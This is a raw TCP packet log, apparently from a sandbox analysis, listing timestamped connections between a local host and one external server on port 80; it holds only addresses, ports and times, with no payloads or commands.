Apr 17, 2024 03:17:03.192660093 CEST	49713	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:03.400685072 CEST	80	49713	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:04.104320049 CEST	80	49713	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:04.104433060 CEST	80	49713	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:04.104473114 CEST	80	49713	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:04.104511023 CEST	80	49713	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:04.104554892 CEST	80	49713	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:04.104598045 CEST	80	49713	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:04.104619980 CEST	49713	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:04.104620934 CEST	49713	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:04.104636908 CEST	80	49713	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:04.104676962 CEST	80	49713	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:04.104686022 CEST	49713	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:04.104712963 CEST	80	49713	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:04.104727030 CEST	49713	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:04.104753017 CEST	80	49713	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:04.104979038 CEST	49713	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:04.313092947 CEST	80	49713	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:04.313158035 CEST	80	49713	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:04.313304901 CEST	49713	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:04.320533991 CEST	80	49713	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:04.320579052 CEST	80	49713	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:04.320641041 CEST	49713	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:04.336429119 CEST	80	49713	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:04.336493969 CEST	80	49713	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:04.336658001 CEST	49713	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:04.349762917 CEST	80	49713	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:04.349816084 CEST	80	49713	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:04.350022078 CEST	49713	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:04.573331118 CEST	49713	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:04.706921101 CEST	49714	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:04.915374994 CEST	80	49714	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:04.915595055 CEST	49714	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:04.956656933 CEST	49714	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:05.164803028 CEST	80	49714	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:05.164978981 CEST	49714	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:05.372986078 CEST	80	49714	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:06.781816959 CEST	80	49714	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:06.781882048 CEST	80	49714	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:06.781920910 CEST	80	49714	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:06.781929016 CEST	49714	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:06.781960011 CEST	80	49714	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:06.781997919 CEST	80	49714	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:06.782015085 CEST	49714	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:06.782037020 CEST	80	49714	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:06.782042980 CEST	49714	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:06.782074928 CEST	80	49714	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:06.782075882 CEST	49714	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:06.782115936 CEST	49714	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:06.782119036 CEST	80	49714	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:06.782155991 CEST	80	49714	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:06.782181025 CEST	49714	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:06.782195091 CEST	49714	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:06.782196999 CEST	80	49714	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:06.782236099 CEST	49714	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:06.929085016 CEST	49716	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:06.990192890 CEST	80	49714	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:06.990366936 CEST	49714	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:07.137222052 CEST	80	49716	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:07.137439966 CEST	49716	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:07.139175892 CEST	49716	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:07.347477913 CEST	80	49716	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:07.347666025 CEST	49716	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:07.555763006 CEST	80	49716	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:08.247116089 CEST	80	49716	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:08.247153044 CEST	80	49716	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:08.247193098 CEST	80	49716	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:08.247230053 CEST	80	49716	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:08.247240067 CEST	49716	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:08.247278929 CEST	49716	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:08.247322083 CEST	49716	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:08.247416019 CEST	80	49716	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:08.247453928 CEST	80	49716	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:08.247489929 CEST	80	49716	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:08.247493029 CEST	49716	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:08.247535944 CEST	49716	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:08.247534990 CEST	80	49716	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:08.247575045 CEST	80	49716	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:08.247611046 CEST	80	49716	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:08.247627020 CEST	49716	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:08.247648001 CEST	49716	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:08.397733927 CEST	49723	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:08.455516100 CEST	80	49716	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:08.455554962 CEST	80	49716	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:08.455571890 CEST	49716	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:08.455604076 CEST	49716	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:08.601131916 CEST	80	49723	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:08.601346016 CEST	49723	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:08.603347063 CEST	49723	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:08.806567907 CEST	80	49723	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:08.806757927 CEST	49723	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:09.010113955 CEST	80	49723	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:09.761991978 CEST	80	49723	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:09.762037039 CEST	80	49723	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:09.762073994 CEST	80	49723	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:09.762110949 CEST	80	49723	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:09.762146950 CEST	80	49723	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:09.762181044 CEST	49723	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:09.762181044 CEST	49723	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:09.762183905 CEST	80	49723	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:09.762181044 CEST	49723	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:09.762181044 CEST	49723	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:09.762204885 CEST	49723	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:09.762222052 CEST	80	49723	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:09.762259007 CEST	80	49723	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:09.762268066 CEST	49723	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:09.762295961 CEST	80	49723	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:09.762304068 CEST	49723	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:09.762332916 CEST	80	49723	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:09.762543917 CEST	49723	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:09.931071997 CEST	49724	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:09.965569019 CEST	80	49723	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:09.965610981 CEST	80	49723	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:09.965645075 CEST	80	49723	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:09.965760946 CEST	49723	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:09.965760946 CEST	49723	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:10.134569883 CEST	80	49724	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:10.134717941 CEST	49724	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:10.136681080 CEST	49724	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:10.340189934 CEST	80	49724	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:10.340393066 CEST	49724	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:10.543708086 CEST	80	49724	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:11.345689058 CEST	80	49724	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:11.345755100 CEST	80	49724	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:11.345793962 CEST	80	49724	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:11.345825911 CEST	49724	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:11.345834017 CEST	80	49724	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:11.345865965 CEST	49724	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:11.345874071 CEST	80	49724	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:11.345912933 CEST	80	49724	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:11.345952988 CEST	80	49724	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:11.345957041 CEST	49724	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:11.345957041 CEST	49724	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:11.345993042 CEST	80	49724	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:11.346030951 CEST	80	49724	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:11.346071005 CEST	80	49724	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:11.346075058 CEST	49724	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:11.346075058 CEST	49724	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:11.346415997 CEST	49724	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:11.486354113 CEST	49725	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:11.549745083 CEST	80	49724	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:11.549810886 CEST	80	49724	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:11.549863100 CEST	49724	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:11.549863100 CEST	49724	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:11.689804077 CEST	80	49725	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:11.693607092 CEST	49725	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:11.695406914 CEST	49725	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:11.898751020 CEST	80	49725	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:11.898840904 CEST	49725	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:12.102196932 CEST	80	49725	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:12.797817945 CEST	80	49725	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:12.797883034 CEST	80	49725	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:12.797921896 CEST	80	49725	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:12.797960997 CEST	80	49725	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:12.798002958 CEST	80	49725	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:12.798041105 CEST	80	49725	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:12.798079014 CEST	80	49725	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:12.798115969 CEST	80	49725	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:12.798121929 CEST	49725	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:12.798121929 CEST	49725	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:12.798121929 CEST	49725	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:12.798121929 CEST	49725	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:12.798122883 CEST	49725	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:12.798122883 CEST	49725	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:12.798152924 CEST	80	49725	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:12.798193932 CEST	80	49725	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:12.798222065 CEST	49725	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:12.798222065 CEST	49725	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:12.798248053 CEST	49725	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:12.956712961 CEST	49726	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:13.001455069 CEST	80	49725	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:13.001518011 CEST	80	49725	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:13.001679897 CEST	49725	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:13.001679897 CEST	49725	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:13.161034107 CEST	80	49726	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:13.161226988 CEST	49726	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:13.162928104 CEST	49726	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:13.366882086 CEST	80	49726	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:13.367156029 CEST	49726	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:13.571362972 CEST	80	49726	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:14.294023991 CEST	80	49726	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:14.294083118 CEST	80	49726	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:14.294121027 CEST	80	49726	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:14.294154882 CEST	49726	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:14.294159889 CEST	80	49726	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:14.294198990 CEST	80	49726	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:14.294228077 CEST	49726	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:14.294228077 CEST	49726	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:14.294240952 CEST	80	49726	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:14.294255972 CEST	49726	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:14.294282913 CEST	80	49726	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:14.294297934 CEST	49726	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:14.294322968 CEST	80	49726	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:14.294339895 CEST	49726	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:14.294363976 CEST	80	49726	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:14.294365883 CEST	49726	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:14.294404030 CEST	80	49726	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:14.294447899 CEST	49726	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:14.294447899 CEST	49726	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:14.453241110 CEST	49727	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:14.498613119 CEST	80	49726	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:14.498681068 CEST	80	49726	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:14.498755932 CEST	49726	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:14.500163078 CEST	49726	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:14.661375999 CEST	80	49727	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:14.661494017 CEST	49727	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:14.663281918 CEST	49727	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:14.871078014 CEST	80	49727	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:14.871156931 CEST	49727	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:15.078880072 CEST	80	49727	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:15.817419052 CEST	80	49727	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:15.817534924 CEST	80	49727	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:15.817575932 CEST	80	49727	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:15.817615986 CEST	80	49727	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:15.817610979 CEST	49727	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:15.817656040 CEST	80	49727	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:15.817689896 CEST	49727	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:15.817689896 CEST	49727	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:15.817698956 CEST	80	49727	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:15.817713976 CEST	49727	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:15.817739964 CEST	80	49727	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:15.817742109 CEST	49727	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:15.817778111 CEST	80	49727	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:15.817785978 CEST	49727	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:15.817816019 CEST	80	49727	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:15.817826986 CEST	49727	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:15.817853928 CEST	80	49727	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:15.817863941 CEST	49727	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:15.817898035 CEST	49727	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:15.959604979 CEST	49728	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:16.025708914 CEST	80	49727	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:16.025774956 CEST	80	49727	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:16.025779963 CEST	49727	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:16.025824070 CEST	49727	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:16.162703037 CEST	80	49728	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:16.162837982 CEST	49728	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:16.164911985 CEST	49728	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:16.367857933 CEST	80	49728	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:16.368056059 CEST	49728	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:16.570909023 CEST	80	49728	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:17.295049906 CEST	80	49728	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:17.295114040 CEST	80	49728	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:17.295152903 CEST	80	49728	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:17.295191050 CEST	80	49728	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:17.295233965 CEST	80	49728	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:17.295270920 CEST	80	49728	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:17.295309067 CEST	80	49728	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:17.295341015 CEST	49728	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:17.295341015 CEST	49728	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:17.295341015 CEST	49728	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:17.295341015 CEST	49728	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:17.295347929 CEST	80	49728	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:17.295387030 CEST	49728	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:17.295392036 CEST	80	49728	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:17.295393944 CEST	49728	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:17.295439005 CEST	80	49728	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:17.295444012 CEST	49728	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:17.295509100 CEST	49728	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:17.442280054 CEST	49729	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:17.498815060 CEST	80	49728	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:17.498882055 CEST	80	49728	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:17.498907089 CEST	49728	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:17.498934984 CEST	49728	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:17.650402069 CEST	80	49729	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:17.650644064 CEST	49729	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:17.652364016 CEST	49729	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:17.860428095 CEST	80	49729	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:17.860613108 CEST	49729	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:18.068579912 CEST	80	49729	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:18.792915106 CEST	80	49729	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:18.792979002 CEST	80	49729	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:18.793018103 CEST	80	49729	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:18.793055058 CEST	80	49729	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:18.793057919 CEST	49729	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:18.793097973 CEST	80	49729	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:18.793132067 CEST	49729	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:18.793138027 CEST	80	49729	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:18.793132067 CEST	49729	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:18.793164968 CEST	49729	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:18.793176889 CEST	80	49729	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:18.793180943 CEST	49729	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:18.793215036 CEST	80	49729	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:18.793225050 CEST	49729	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:18.793256044 CEST	80	49729	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:18.793267965 CEST	49729	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:18.793349028 CEST	80	49729	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:18.793354988 CEST	49729	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:18.793395996 CEST	49729	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:18.948725939 CEST	49730	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:19.001327991 CEST	80	49729	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:19.001394987 CEST	80	49729	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:19.001761913 CEST	49729	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:19.152223110 CEST	80	49730	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:19.152553082 CEST	49730	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:19.154294968 CEST	49730	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:19.357322931 CEST	80	49730	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:19.357424974 CEST	49730	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:19.560373068 CEST	80	49730	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:20.300321102 CEST	80	49730	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:20.300359011 CEST	80	49730	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:20.300395966 CEST	80	49730	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:20.300436974 CEST	80	49730	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:20.300472021 CEST	80	49730	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:20.300508976 CEST	80	49730	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:20.300546885 CEST	80	49730	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:20.300574064 CEST	49730	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:20.300584078 CEST	80	49730	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:20.300575018 CEST	49730	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:20.300575018 CEST	49730	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:20.300622940 CEST	80	49730	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:20.300661087 CEST	80	49730	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:20.300662994 CEST	49730	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:20.300662994 CEST	49730	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:20.300692081 CEST	49730	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:20.300710917 CEST	49730	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:20.441917896 CEST	49731	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:20.503587961 CEST	80	49730	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:20.503628969 CEST	80	49730	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:20.503653049 CEST	49730	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:20.503727913 CEST	49730	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:20.645888090 CEST	80	49731	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:20.647623062 CEST	49731	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:20.757055044 CEST	49731	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:20.960588932 CEST	80	49731	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:20.960659027 CEST	49731	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:21.164016962 CEST	80	49731	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:21.903901100 CEST	80	49731	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:21.903965950 CEST	80	49731	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:21.904007912 CEST	80	49731	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:21.904021025 CEST	49731	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:21.904048920 CEST	80	49731	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:21.904087067 CEST	80	49731	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:21.904109955 CEST	49731	80	192.168.2.5	136.244.109.75
